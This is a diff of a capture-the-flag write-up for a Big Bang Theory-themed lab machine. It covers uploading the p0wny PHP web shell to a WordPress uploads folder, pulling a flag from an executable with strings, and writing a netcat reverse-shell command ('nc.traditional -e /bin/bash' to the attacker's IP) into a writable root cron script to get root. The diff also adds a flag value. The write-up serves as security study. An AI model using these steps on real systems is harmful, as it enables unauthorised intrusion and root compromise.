ChrisPritchard/ctf-writeups/01-tbbt-fun-with-flags.md

 and uploaded the php shell from here: [flozz/p0wny-shell](https://github.com/flozz/p0wny-shell/blob/master/shell.php)

-This gave me a shell on the machine when I browsed to it (it was under wp-content/uploads), running under www-data but which seemed to have a lot of access.
-Going through the user dirs, I found an exe in amy's dir that revealed a flag when run through `strings`
+This gave me a shell on the machine when I browsed to it (it was under `wp-content/uploads/2020/03`), running under www-data but which seemed to have a lot of access.
+Going through the user dirs, I found an exe in amy's dir that revealed a flag when run through `strings`:

+`FLAG-amy{60263777358690b90e8dbe8fea6943c9}`

 ## Leonard's cron job

-Leonards home dir had a shell script, owned by root, that was run by root every minute.
-And was writable.
+Leonards home dir had a shell script, owned by root.
+It contained a comment saying that it was run every minute, and it was also writeable.

 I echoed the following command into it and got a reverse shell via netcat: `echo "nc.traditional -e /bin/bash 192.168.1.3 1235" > thermostat_set_temp.sh`, running `nc -nvlp 1235` on the kali machine.
 This gave me a root shell!